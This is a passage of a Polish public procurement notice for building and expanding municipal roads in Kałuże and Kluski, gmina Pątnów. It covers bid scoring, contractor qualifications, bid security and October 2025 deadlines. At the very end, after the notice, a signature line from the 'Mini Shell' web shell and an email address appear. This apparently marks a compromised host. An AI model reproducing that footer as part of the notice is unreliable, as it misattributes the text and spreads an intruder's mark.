Zamawiającego jako maksymalny wymagany czas gwarancji i rękojmi tj. 60 miesięcy<br/>W przypadku braku zaoferowania przez Wykonawcę okresu gwarancji jakości i rękojmi,<br/>Zamawiający do oceny przyjmie minimalny przewidziany w postępowaniu okres, czyli 36 miesięcy.<br/>Okres rękojmi równa się okresowi gwarancji.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów. Przyznane punktu zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>3) Łączna ocena ofert: <br/>W= C + G <br/>gdzie:<br/>W – wskaźnik oceny ofert,<br/>C – ilość punktów przyznanych w Kryterium „Cena”<br/>G – ilość punktów przyznanych w Kryterium „Okres gwarancji jakości i rękojmi”<br/>Punktacja przyznawana ofertą w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/>Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawi taki sam wskaźnik oceny oferty, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III: Rozbudowa drogi gminnej nr 117160E od km 0+0,000 do km 0+779,13 w m. Kałuże i Kluski (Grabowszczyzna), gm. Pątnów.<br/>Inwestycja polega na wykonaniu robót budowlanych tj. rozbudowie drogi gminnej nr 117160E w m. Kałuże i Kluski (Grabowszczyzna) na odcinku o długości ok. 0,779 km i zapewnieniu niezbędnych materiałów budowlanych, celem zrealizowania umowy. Zakres robót obejmuje m.in.:<br/>• roboty rozbiórkowe i przygotowawcze (m.in.: pomiary, karczowanie i oczyszczenie terenu, <br/>• roboty ziemne (m.in.: wykopy oraz przekopy w gruncie, plantowanie i obrabianie, humusowanie terenu);<br/>•	wykonanie odwodnienia;<br/>•	wykonanie przyjezdnego prefabrykowanego ścieku betonowego; <br/>• wykonanie konstrukcji jezdnej drogi o nawierzchni asfaltowej i szerokości 4,0m; <br/>UWAGA!!! Wykonanie zgodnie z rys. DP/K – przekrój konstrukcyjny oraz rys. DP/PZT – szkicem zagospodarowania terenu<br/>• wykonanie obustronnych poboczy z kruszywa i szerokości 0,75m; <br/>• wykonanie oznakowania pionowego i poziomego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty, dla każdej z Części, Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Lp.	Nazwa kryterium	Waga<br/>1.	Cena (C)	60 %<br/>2.	Okres gwarancji jakości i rękojmi (G)	40 %<br/>Razem	100 %<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Kryterium Cena (C) – waga 60%<br/> cena najniższa brutto*<br/>C = ———————————————— x 100 pkt x 60%<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepolegających odrzuceniu<br/>Podstawą przyznania punków w Kryterium cena (C) będzie cena oferowana brutto podana przez Wykonawcę w Formularzy oferty. <br/>Cena oferowana brutto musi uwzględniać wszystkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/>W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punktu zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>2) Kryterium Okres gwarancji jakości i rękojmi (G) – waga 40%<br/>Liczba punktów za kryterium „Okres gwarancji jakości i rękojmi&#34; będzie liczony wg. następującego wzoru:<br/>G = (Gbad / Gmax ) x 100 pkt x 40 %<br/>gdzie:<br/>G - ilość punktów przyznanej danej ofercie za okres gwarancji jakości i rękojmi;<br/>Gbad - okres gwarancji jakości i rękojmi podany przez oferenta, dla którego wynik jest<br/>obliczany.<br/>Gmax - najdłuższy okres gwarancji jakości i rękojmi spośród badanych ofert;<br/>Zamawiający ustala minimalny okres gwarancji jakości i rękojmi na przedmiot<br/>zamówienia na 36 miesięcy, zaś maksymalny na 60 miesiące.<br/>Zaoferowanie przez Wykonawcę okresu gwarancji jakości i rękojmi zamówienia poniżej<br/>ustalonego minimum, spowoduje odrzucenie oferty, jej treść jest niezgodna z warunkami zamówienia - art. 226 ust. l pkt 5 ustawy Pzp.<br/>Zaoferowanie przez Wykonawcę okresu gwarancji jakości i rękojmi zamówienia powyżej ustalonego maksimum będzie traktowane przez Zamawiającego jako maksymalny wymagany czas gwarancji i rękojmi tj. 60 miesięcy<br/>W przypadku braku zaoferowania przez Wykonawcę okresu gwarancji jakości i rękojmi,<br/>Zamawiający do oceny przyjmie minimalny przewidziany w postępowaniu okres, czyli 36 miesięcy.<br/>Okres rękojmi równa się okresowi gwarancji.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów. Przyznane punktu zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>3) Łączna ocena ofert: <br/>W= C + G <br/>gdzie:<br/>W – wskaźnik oceny ofert,<br/>C – ilość punktów przyznanych w Kryterium „Cena”<br/>G – ilość punktów przyznanych w Kryterium „Okres gwarancji jakości i rękojmi”<br/>Punktacja przyznawana ofertą w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/>Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawi taki sam wskaźnik oceny oferty, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolność do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w powyższym zakresie.<br/>3) Sytuacja ekonomiczna lub finansowa:<br/>Zamawiający nie stawia wymagań w powyższym zakresie. <br/>4) Zdolność techniczna lub zawodowa w zakresie wiedzy i doświadczenia:<br/>Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże, że:<br/>a) Dla Części I - w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał należycie co najmniej jedno zadania polegające na budowie lub rozbudowie drogi o nawierzchni bitumicznej o wartości nie mniejszej niż 130 000 PLN brutto wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których te roboty zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie. Wykaz prac należy złożyć wg Załącznika nr 7 do SWZ. <br/>Zamawiający zastrzega, iż przez jedno zadanie rozumie jedną wykonaną robotę budowlaną w ramach jednej umowy/kontraktu/zlecenia. <br/>Wyżej wskazany okres 5 lat liczy się wstecz od dnia, w którym upływa termin składania ofert. <br/>Dla Części II i Części III - w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał należycie co najmniej jedno zadania polegające na budowie lub rozbudowie drogi o nawierzchni bitumicznej o wartości nie mniejszej niż 230 000 PLN brutto wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których te roboty zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie. Wykaz prac należy złożyć wg Załącznika nr 7 do SWZ. <br/>Zamawiający zastrzega, iż przez jedno zadanie rozumie jedną wykonaną robotę budowlaną w ramach jednej umowy/kontraktu/zlecenia. <br/>Wyżej wskazany okres 5 lat liczy się wstecz od dnia, w którym upływa termin składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia:<br/>a) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 poz. 1689), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej- wzór stanowi Załącznik nr 8 do SWZ.<br/>b)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument składa każdy w Wykonawców wspólnie ubiegających się o zamówienia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w odniesieniu do warunku określonego w Rozdziale VII SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca zobowiązany jest złożyć:<br/>•	Formularz oferty, stanowiący Załącznik nr 3 do SWZ, <br/>•	Oświadczenie o braku podstaw do wykluczenia z postępowania, stanowiące Załącznik nr 5 do SWZ, składane na podstawie art. 125 ust.1 ustawy Pzp i art. 7 ust.1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/>•	Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z<br/>Załącznikiem nr 4 do SWZ, składane na podstawie art. 125 ust. 1 ustawy Pzp,<br/>•	Oświadczenie o braku podstaw do wykluczenia podmiotu, na którego zasoby powołuje się Wykonawca (jeżeli dotyczy) - stanowiące Załącznik nr 5a do SWZ,<br/>•	Oświadczenie o spełnieniu warunków udziału w postępowaniu podmiotu, na którego zasoby powołuje się Wykonawca (jeżeli dotyczy) zgodnie z Załącznikiem nr 4a do SWZ,<br/>•	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy), stanowiący Załącznik nr do 9 SWZ,<br/>•	Odpowiednie pełnomocnictwo wraz z oświadczeniem o jego aktualności na dzień składania ofert (jeśli dotyczy),<br/>•	Zobowiązanie podmiotu trzeciego (jeśli dotyczy), stanowiące Załącznik nr 6 do SWZ,<br/>• Dowód wniesienia wadium (w przypadku formy innej niż pieniądz należy przekazać dokument elektroniczny). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości:<br/>a) Część I - 2 106,96 zł (słownie: dwa tysiące sto sześć złotych 96|100),<br/>b) Część II – 5 066,22 zł (słownie: pięć tysięcy sześćdziesiąt sześć złotych 22|100)<br/>c) Część III – 5 403,29 zł (słownie: pięć tysięcy czterysta trzy złote 29|100)<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>Rejonowy Bank Spółdzielczy Lututów O/Wieluń<br/>Nr 68 9256 0004 0075 8190 2000 0040<br/>z adnotacją:<br/>a) Część I „Wadium – Budowa drogi gminnej w m. Kałuże gm. Pątnów – Trasa 3” <br/>b) Część II „Wadium -Budowa drogi gminnej w m. Kałuże od km 0+0,000 do km 0+276,16, gm. Pątnów” <br/>c) Część III „Wadium -Rozbudowa drogi gminnej nr 117160E od km 0+0,000 do km 0+779,13 w m. Kałuże i Kluski (Grabowszczyzna), gm. Pątnów” <br/>Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej - przed upływem terminu składania ofert.<br/>W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a) nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b) kwotę wadium,<br/>c) termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej <br/>w gwarancji/poręczeniu na pierwsze żądanie zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach <br/>art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Zamawiający, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku określonego w Rozdziale VII ust 2 pkt 4 SWZ uzna warunek za spełniony, jeżeli co najmniej jeden z Wykonawców spełnia warunek samodzielnie. Analogicznie w przypadku polegania przez Wykonawcę na zdolnościach podmiotu trzeciego celem wykazania spełnienia warunku, o którym mowa w Rozdziale VII ust 2 pkt 4 to podmiot trzeci ma spełnić ten warunek samodzielnie.<br/>W odniesieniu do spełnienia stawianego warunku Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy faktycznie wykonają usługi, do realizacji których zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Przedmiotowe oświadczenie zawiera Załącznik nr do 9 SWZ.<br/>Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w Projekcie Umowy, stanowiącym Załącznik nr 2 do SWZ (Część I), Załącznik nr 2a do SWZ (Część II) oraz Załącznik nr 2b do SWZ (Część III). <br/>Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie wskazanym w Projekcie Umowy. <br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1176292</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-01 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com